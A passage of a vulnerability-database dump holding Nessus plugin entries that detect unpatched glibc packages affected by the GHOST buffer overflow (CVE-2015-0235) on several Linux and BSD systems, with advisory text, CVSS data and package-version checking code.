audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"glibc-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-common-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-devel-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-headers-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-utils-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"nscd-2.5-123.0.1.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:52", "description": "This update for glibc fixes the following security issue :\n\nCVE-2015-0235: A vulnerability was found and fixed in the GNU C Library, specifically in the function gethostbyname(), that could lead to a local or remote buffer overflow. (bsc#913646)", "cvss3": {}, "published": "2015-02-03T00:00:00", "type": "nessus", "title": "openSUSE Security Update : glibc (openSUSE-SU-2015:0184-1) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:glibc", "p-cpe:/a:novell:opensuse:glibc-debuginfo", "p-cpe:/a:novell:opensuse:glibc-debugsource", "p-cpe:/a:novell:opensuse:glibc-devel", "p-cpe:/a:novell:opensuse:glibc-devel-debuginfo", "p-cpe:/a:novell:opensuse:glibc-devel-static", "p-cpe:/a:novell:opensuse:glibc-extra", "p-cpe:/a:novell:opensuse:glibc-extra-debuginfo", "p-cpe:/a:novell:opensuse:glibc-html", "p-cpe:/a:novell:opensuse:glibc-i18ndata", "p-cpe:/a:novell:opensuse:glibc-info", "p-cpe:/a:novell:opensuse:glibc-locale", "p-cpe:/a:novell:opensuse:glibc-locale-debuginfo", "p-cpe:/a:novell:opensuse:glibc-obsolete", "p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo", "p-cpe:/a:novell:opensuse:glibc-profile", "p-cpe:/a:novell:opensuse:glibc-utils", "p-cpe:/a:novell:opensuse:glibc-utils-32bit", "p-cpe:/a:novell:opensuse:glibc-utils-debuginfo", "p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit", "p-cpe:/a:novell:opensuse:glibc-utils-debugsource", "p-cpe:/a:novell:opensuse:nscd", "p-cpe:/a:novell:opensuse:nscd-debuginfo", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2015-84.NASL", "href": "https://www.tenable.com/plugins/nessus/81136", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-84.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81136);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-0235\");\n\n script_name(english:\"openSUSE Security Update : glibc (openSUSE-SU-2015:0184-1) (GHOST)\");\n script_summary(english:\"Check for the openSUSE-2015-84 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issue :\n\nCVE-2015-0235: A vulnerability was found and fixed in the GNU C\nLibrary, specifically in the function gethostbyname(), that could lead\nto a local or remote buffer overflow. (bsc#913646)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=913646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-02/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-debugsource-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-static-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-extra-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-extra-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-html-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-i18ndata-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-info-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-locale-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-locale-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-obsolete-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-obsolete-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-profile-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-debugsource-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nscd-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nscd-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-utils-32bit-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-utils-debuginfo-32bit-2.17-4.17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc-utils / glibc-utils-32bit / glibc-utils-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:49", "description": "A vulnerability has been discovered and corrected in glibc :\n\nHeap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka GHOST. (CVE-2015-0235)\n\nThe updated packages have been patched to correct this issue.", "cvss3": {}, "published": "2015-02-11T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : glibc (MDVSA-2015:039)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:glibc", "p-cpe:/a:mandriva:linux:glibc-devel", "p-cpe:/a:mandriva:linux:glibc-doc", "p-cpe:/a:mandriva:linux:glibc-doc-pdf", "p-cpe:/a:mandriva:linux:glibc-i18ndata", "p-cpe:/a:mandriva:linux:glibc-profile", "p-cpe:/a:mandriva:linux:glibc-static-devel", "p-cpe:/a:mandriva:linux:glibc-utils", "p-cpe:/a:mandriva:linux:nscd", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2015-039.NASL", "href": "https://www.tenable.com/plugins/nessus/81280", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:039. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81280);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"MDVSA\", value:\"2015:039\");\n\n script_name(english:\"Mandriva Linux Security Advisory : glibc (MDVSA-2015:039)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been discovered and corrected in glibc :\n\nHeap-based buffer overflow in the __nss_hostname_digits_dots function\nin glibc 2.2, and other 2.x versions before 2.18, allows\ncontext-dependent attackers to execute arbitrary code via vectors\nrelated to the (1) gethostbyname or (2) gethostbyname2 function, aka\nGHOST. (CVE-2015-0235)\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0092\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-devel-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glibc-doc-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"glibc-doc-pdf-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-i18ndata-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-profile-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-static-devel-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"glibc-utils-2.14.1-12.11.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"nscd-2.14.1-12.11.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:46:38", "description": "Robert Kratky reports :\n\nGHOST is a 'buffer overflow' bug affecting the gethostbyname() and gethostbyname2() function calls in the glibc library. This vulnerability allows a remote attacker that is able to make an application call to either of these functions to execute arbitrary code with the permissions of the user running the application. The gethostbyname() function calls are used for DNS resolving, which is a very common event. To exploit this vulnerability, an attacker must trigger a buffer overflow by supplying an invalid hostname argument to an application that performs a DNS resolution.", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "nessus", "title": "FreeBSD : glibc -- gethostbyname buffer overflow (0765de84-a6c1-11e4-a0c1-c485083ca99c) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-c6-devtools", "p-cpe:/a:freebsd:freebsd:linux-f10-devtools", "p-cpe:/a:freebsd:freebsd:linux_base-c6", "p-cpe:/a:freebsd:freebsd:linux_base-f10", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0765DE84A6C111E4A0C1C485083CA99C.NASL", "href": "https://www.tenable.com/plugins/nessus/81062", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81062);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\");\n\n script_name(english:\"FreeBSD : glibc -- gethostbyname buffer overflow (0765de84-a6c1-11e4-a0c1-c485083ca99c) (GHOST)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Robert Kratky reports :\n\nGHOST is a 'buffer overflow' bug affecting the gethostbyname() and\ngethostbyname2() function calls in the glibc library. This\nvulnerability allows a remote attacker that is able to make an\napplication call to either of these functions to execute arbitrary\ncode with the permissions of the user running the application. The\ngethostbyname() function calls are used for DNS resolving, which is a\nvery common event. To exploit this vulnerability, an attacker must\ntrigger a buffer overflow by supplying an invalid hostname argument to\nan application that performs a DNS resolution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/1332213\"\n );\n # http://www.openwall.com/lists/oss-security/2015/01/27/9\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2015/01/27/9\"\n );\n # https://vuxml.freebsd.org/freebsd/0765de84-a6c1-11e4-a0c1-c485083ca99c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd7b81d9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-devtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-devtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-c6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-f10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-c6<6.6_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-f10>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-devtools<6.6_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-devtools>=0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:40:53", "description": "The remote host is running a version of Gaia OS which is affected by a heap buffer overflow vulnerability in glibc which could potentially allow an attacker execute arbitrary code in the context of the user running the affected application.", "cvss3": {}, "published": "2017-12-04T00:00:00", "type": "nessus", "title": "Check Point Gaia Operating Remote Heap Buffer Overflow (sk104443)(GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/o:check_point:gaia_os"], "id": "CHECK_POINT_GAIA_SK104443.NASL", "href": "https://www.tenable.com/plugins/nessus/104998", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104998);\n script_version(\"1.4\");\n 